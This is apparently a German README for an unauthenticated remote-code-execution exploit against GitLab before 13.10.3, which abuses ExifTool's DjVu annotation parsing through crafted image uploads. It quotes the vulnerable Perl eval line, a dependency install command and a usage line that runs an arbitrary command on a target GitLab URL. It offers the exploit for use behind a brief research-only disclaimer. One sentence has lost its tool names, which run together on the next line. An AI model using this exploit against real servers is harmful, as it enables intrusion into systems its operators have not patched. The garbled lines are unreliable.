
Unauthentifizierter Remote-Code-Execution-Exploit für GitLab-Versionen < 13.10.3, der die ExifTool-DjVu-Anmerkungsparsung ausnutzt, um beliebige Befehle über manipulierte Bild-Uploads auszuführen.
Unauthentifizierter RCE-Exploit für Gitlab-Version < 13.10.3
Nur für Bildungs- und Forschungszwecke. Verwendung auf eigene Gefahr.
Grundursache:
# convert C escape sequences (allowed in quoted text)
$tok = eval qq{"$tok"};
Zum Funktionieren müssen und installiert sein.
djvumakedjvulibreInstalliere djvulibre (falls du es noch nicht installiert hast)
sudo apt-get install -y djvulibre-bin
Führe den Exploit aus
python3 exploit.py -t <gitlab_url> -c <command>
Getestet auf Version 13.10.1-ce.0